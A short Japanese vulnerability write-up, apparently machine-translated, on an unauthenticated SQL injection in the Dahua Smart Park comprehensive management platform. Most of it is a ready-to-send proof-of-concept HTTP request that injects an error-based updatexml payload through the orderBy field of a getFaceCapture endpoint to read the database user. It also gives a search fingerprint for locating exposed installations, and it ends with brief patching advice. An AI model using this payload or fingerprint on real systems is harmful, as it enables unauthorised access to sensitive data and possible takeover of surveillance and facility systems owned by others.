0x01 製品紹介
「大華スマートパーク総合管理プラットフォーム」は、公園運営、リソース配分、インテリジェントサービスなどの機能を備えた総合管理プラットフォームです。このプラットフォームは、多様化する管理ニーズを満たすために公園のリソース配分を最適化するのを支援すると同時に、インテリジェントなサービスを提供することでユーザーエクスペリエンスを向上させることを目的としています。
0x02 脆弱性の概要
Dahua Smart Park の包括的な管理プラットフォームは、ユーザー入力を効果的にフィルタリングせず、SQL クエリ ステートメントに直接接続したため、システムに SQL インジェクションの脆弱性が発生しました。リモートの無許可の攻撃者がこの脆弱性を悪用して機密情報を取得し、さらに悪用してターゲット システムの権限を取得する可能性があります。
0x03 再発環境
Intergraph フィンガープリント: web.body="/WPMS/asset/lib/gridster/"
0x04 脆弱性の再発
実証実験
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
現在のユーザーをクエリする
0x05 修復の提案
アクセス元アドレスを制限し、必要な場合以外はシステムをインターネットに公開しないでください。
できるだけ早くパッチを当ててください!